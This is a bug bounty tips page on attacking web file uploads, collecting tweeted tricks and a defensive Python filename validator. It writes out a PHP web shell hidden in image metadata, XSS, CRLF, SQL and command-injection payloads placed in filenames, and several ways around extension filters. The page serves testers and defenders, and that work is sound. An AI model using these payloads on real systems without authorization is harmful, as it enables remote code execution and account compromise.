# File Upload

* [#BugBountyProTip Some caching servers would cache files larger than 2 MB. If the app accepts file upload, then upload a large file and access it multiple times while logged in. It will be cached. Then access it without login, and bingo! Unauthenticated access to sensitive files!](https://twitter.com/Zigoo0/status/1247175475316830208)
* [Uploader Vuln:](https://twitter.com/YShahinzadeh/status/1063403827590762497) #BugBounty\
  `Content-Disposition: form-data; name="FactorImage"; filename="Untitled.jpg\test.aspx"`\
  `Content-Type: image/jpeg`\
  Res: `{"StoreHousePicture_File":"test.aspx","Success":true}`
* <https://anotherhackerblog.com/exploiting-file-uploads-pt1/>
* <https://anotherhackerblog.com/exploiting-file-uploads-pt-2/>
* Payloads - <https://github.com/1N3/IntruderPayloads/tree/master/Uploads>
* [Bypassing most FILE Uploads filters for $$$$](https://twitter.com/pwntheweb/status/1258628238655598592) #bugbountytips #BugBounty
  * `.htaccess` <- upload htaccess
  * `file.svg` <- uploading svg = xss
  * `file.SVg` <- must try case mismatch
  * `file.png.svg`
  * `file.php%00.png`
  * `file.png' or '1'='1`
  * `../../file.png`
  * `file.'svg` <- invalid ext.
* [Bypass File Upload Filtering in image:](https://twitter.com/shreyasrx/status/1257501243171373066) `exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg` then `mv shell.jpg shell.php.jpg` #bugbountytip #bugbountytips
* [Time for another #BugBountyTip: While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if the ".asp" extension is blacklisted. This has already led me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming.](https://twitter.com/HusseiN98D/status/1194304002969743362)
* [#BugBounty If you find a file upload function for an image, try introducing an image with XSS in the filename like so:](https://twitter.com/h4x0r_dz/status/1292452802338476037)
  * `<img src=x onerror=alert('XSS')>.png`
  * `"><img src=x onerror=alert('XSS')>.png`
  * `"><svg onmouseover=alert(1)>.svg`
  * `<<script>alert('xss')<!--a-->a.png`
* [#Bugbountytip Want to bypass file extension restriction? Try HTTP Parameter Pollution on the filename parameter.](https://twitter.com/Hxzeroone/status/1250342399068352512?s=20)
* [bypassing file content restrictions: in some cases you can do a CRLF injection via the filename `x.png%22%0d%0a%0d%0a%0d%0a<script>alert(1)</script>`; this will cause Content-Disposition to throw its content into the file #bugbounty #xss #crlfinjection #bugbountytip](https://twitter.com/k33r0k/status/1047700322322399233?s=20)
* [RT @M404ntf: If a web application allows you to upload a .zip file, zip:// is an interesting PHP wrapper to turn an LFI into an RCE. #BugBounty #BugBountyTips #InfoSec](https://twitter.com/infosecsanyam/status/1339481832451092480?s=20)

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MTeBxfDIJOIOprbYVje%2F-MTeC1rUild_UYMYAiWY%2Fimage.png?alt=media\&token=7b394796-e30d-4747-b569-8f108798fe4e)

[Chaining file uploads with other vulns:](https://twitter.com/ManasH4rsh/status/1315624930998775808?s=20)

```
Set filename to:

> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi
> <svg onload=alert(document.domain)>.jpg/png for XSS
> ; sleep 10; for command injections
```
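The filename tricks collected above (case mismatch, double extensions, `%00`, CRLF in the name, traversal, `.htaccess`, and SQLi/XSS/command-injection payloads used as filenames) all fall to the same defensive pattern: decode once, allowlist the final extension, reject anything outside a conservative character set, and store the file under a server-chosen name. The Python below is an added example, not code from any of the quoted tweets; the allowed extensions and the 64-character stem limit are assumptions.

```python
"""Defensive filename handling for an image upload endpoint (added example).
Each rejected case corresponds to a trick quoted on this page: traversal, case
mismatch, double extension, %00, CRLF, dotfiles, and quote/tag/semicolon payloads."""
import re
import uuid
from typing import Optional
from urllib.parse import unquote

# Assumption: the endpoint only accepts raster images.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}
# Assumption: conservative allowlist for the part before the extension.
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_upload_name(client_name: str) -> Optional[str]:
    """Return the lowercase extension if the client filename is acceptable, else None."""
    # Decode once so %00 and %0d%0a are judged as the bytes they become server-side.
    name = unquote(client_name)
    # NUL, CR, LF and other control characters only exist to confuse a parser.
    if any(ord(ch) < 0x20 or ch == "\x7f" for ch in name):
        return None
    # No directory components from either separator family, no traversal.
    if "/" in name or "\\" in name or ".." in name:
        return None
    # Split on the LAST dot: "file.png.svg" is an .svg, "file.SVg" is an .svg.
    stem, dot, ext = name.rpartition(".")
    if not dot or not stem:  # no extension at all, or a dotfile such as ".htaccess"
        return None
    ext = ext.lower()
    if ext not in ALLOWED_EXTENSIONS:
        return None
    # Quotes, <, >, ;, spaces, parentheses and inner dots never belong in a stored
    # filename, so "shell.php.jpg" fails here even though its final extension is fine.
    if not SAFE_STEM.fullmatch(stem):
        return None
    return ext


def storage_name(client_name: str) -> Optional[str]:
    """Server-chosen name: random hex plus the validated extension. The client stem is
    never reused, so nothing the uploader controls reaches the stored path or a later
    Content-Disposition header."""
    ext = validate_upload_name(client_name)
    if ext is None:
        return None
    return f"{uuid.uuid4().hex}.{ext}"
```

Serving the upload directory with script execution disabled remains necessary; this check only keeps attacker-controlled names and extensions out of it.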

Want to bypass file extension restriction? Try HTTP Parameter Pollution on the filename parameter.

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MWEFbGGk8Sx5GellR2z%2F-MWEFgEN14t2enelKC7W%2Fimage.png?alt=media\&token=79687068-e0c1-4f81-8693-2569c2db2729)
